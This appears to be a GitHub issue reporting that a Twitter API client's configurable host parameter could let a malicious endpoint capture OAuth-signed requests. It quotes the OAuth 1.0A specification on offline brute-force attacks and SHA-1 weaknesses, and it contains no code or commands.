Security vulnerability: Twitter credentials may be vulnerable to capture

[toddmazierski]

Disclaimer: I'm not an expert on OAuth or cryptography, so please feel free to dispute this!

I believe I've discovered a security vulnerability that could make a user's Twitter credentials vulnerable to capture. Because the Twitter API hostname is configurable via the host parameter, a malicious user could set up their own API endpoint to eavesdrop on Twitter API requests.

Now, the requests are cryptographically signed, however, according to section 11.10 of the OAuth 1.0A documentation:

…eavesdroppers will have full access to OAuth requests and signatures, and will thus be able to mount offline brute-force attacks to recover the Consumer's credentials used. Service Providers should be careful to assign Token Secrets and Consumer Secrets which are long enough - and random enough - to resist such attacks for at least the length of time that the secrets are valid.

In addition, according to section 11.12:

SHA-1, the hash algorithm used in HMAC-SHA1 signatures, has been shown to have a number of cryptographic weaknesses that significantly reduce its resistance to collision attacks. Practically speaking, these weaknesses are difficult to exploit, and by themselves do not pose a significant risk to users of OAuth. They may, however, make more efficient attacks possible, and NIST has announced that it will phase out use of SHA-1 by 2010.